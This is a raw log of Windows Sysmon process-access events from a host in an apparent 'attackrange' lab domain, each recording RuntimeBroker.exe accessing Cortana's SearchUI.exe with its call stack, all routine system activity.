l+51821 10341000x80000000000000007037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
